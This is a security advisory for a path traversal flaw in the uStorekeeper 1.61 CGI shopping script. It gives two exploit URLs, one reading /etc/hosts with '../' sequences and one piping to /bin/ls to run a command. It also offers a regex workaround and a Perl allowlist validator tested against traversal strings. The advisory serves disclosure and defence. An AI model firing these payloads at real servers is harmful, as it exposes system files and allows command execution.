Vulnerability

    uStorekeeper

Affected

    uStorekeeper(tm) Online Shopping System - ustorekeeper.pl version 1.61 (probably others, but not tested)

Description

    UkR hacking team found the following. '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retrieve files from the remote server which should not normally be accessible (for example, /etc/passwd).

    Exploit:

    http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
    http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |

    zenomorph from 'cgisecurity' added the following. The following advisory was actually found in December of 2000 by the staff at cgisecurity.com. No Bugtraq post was published, on the other hand, because after speaking with the vendor they informed them that not every version was affected and that the newer versions of this product have been patched. A staff member of cgisecurity.com did make a proof of exploit for this code but they did give little details of the vendor due to them asking them not to.

Solution

    Workaround:

    # this will help somewhat...
    # note: [...] is a character class, so this deletes every '(', ')', '.', '|' and '/' character
    $input =~ s/[(\.\.)|\/]//g;
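
An added example (not part of the original advisory or of ustorekeeper.pl): a stricter alternative to the character-stripping workaround, which refuses any file value outside an allowlist and then confirms that the canonical path stays inside the page directory. The helper name resolve_page, the allowed character set, the single base directory and the temporary test directory are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Spec;
use File::Temp qw(tempdir);

# Hypothetical helper (not from ustorekeeper.pl): map a user-supplied "file"
# value to a path under $base, or return undef if it must be refused.
sub resolve_page {
    my ($base, $name) = @_;
    return unless defined $name;

    # 1. Allowlist instead of stripping: a single path component with no
    #    separators, no leading dot, no NUL bytes, no shell metacharacters.
    return unless $name =~ /\A[A-Za-z0-9_-][A-Za-z0-9_.-]{0,63}\z/;

    # 2. The file must exist as a regular file inside the page directory.
    my $root = abs_path($base);
    return unless defined $root;
    my $candidate = File::Spec->catfile($root, $name);
    return unless -f $candidate;

    # 3. Canonicalise and confirm containment; this also catches a symlink
    #    inside $base that points somewhere else on the file system.
    my $real = abs_path($candidate);
    return unless defined $real && index($real, "$root/") == 0;

    return $real;
}

# Constructed test data: a temporary page directory holding one file.
my $base = tempdir(CLEANUP => 1);
open(my $fh, '>', "$base/index.html") or die "create: $!";
print {$fh} "<html></html>\n";
close($fh);

# Constructed inputs: one legitimate name, then values that must be refused.
for my $input ('index.html', '../../../../etc/hosts', '/etc/hosts',
               '....//....//etc/hosts', "index.html\0.txt", '.htaccess') {
    (my $shown = $input) =~ s/\0/\\0/g;
    my $path = resolve_page($base, $input);
    printf "%-28s => %s\n", $shown, defined $path ? 'served' : 'refused';
}
```

Only index.html is served; every other input is refused at the allowlist step, before any path is built from it.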